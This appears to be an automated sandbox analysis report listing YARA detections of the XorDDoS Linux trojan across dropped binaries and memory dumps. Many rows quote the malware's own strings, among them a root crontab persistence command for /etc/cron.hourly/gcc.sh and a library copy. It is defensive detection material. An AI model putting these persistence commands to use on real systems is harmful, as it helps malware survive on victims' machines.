/usr/bin/ybavzvdbws	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/ybavzvdbws	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/eygutfitxp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/eygutfitxp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/eygutfitxp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/eygutfitxp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/eygutfitxp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/eygutfitxp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/eygutfitxp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ljhaidbadz	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ljhaidbadz	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ljhaidbadz	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/ljhaidbadz	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ljhaidbadz	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/ljhaidbadz	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/ljhaidbadz	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ogbruyreel	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ogbruyreel	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ogbruyreel	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/ogbruyreel	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ogbruyreel	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/ogbruyreel	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/ogbruyreel	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/xilfqxoepi	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/xilfqxoepi	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/xilfqxoepi	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/xilfqxoepi	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/xilfqxoepi	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/xilfqxoepi	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/xilfqxoepi	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/zuuufkngmy	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zuuufkngmy	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/zuuufkngmy	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/zuuufkngmy	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/zuuufkngmy	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/zuuufkngmy	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/zuuufkngmy	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/vwtoogupfm	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/vwtoogupfm	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/vwtoogupfm	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/vwtoogupfm	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/vwtoogupfm	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/vwtoogupfm	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/vwtoogupfm	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/wrvgghkqdd	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/pmvkvnihjm	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wrvgghkqdd	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/wrvgghkqdd	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/wrvgghkqdd	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/wrvgghkqdd	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/wrvgghkqdd	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/pmvkvnihjm	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/pmvkvnihjm	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/pmvkvnihjm	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/pmvkvnihjm	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/pmvkvnihjm	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/wrvgghkqdd	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/pmvkvnihjm	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Click to see the 104 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6415.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6403.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6403.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6403.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6403.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6403.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6403.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6403.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6348.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6477.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6406.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6526.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6559.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6559.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6559.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
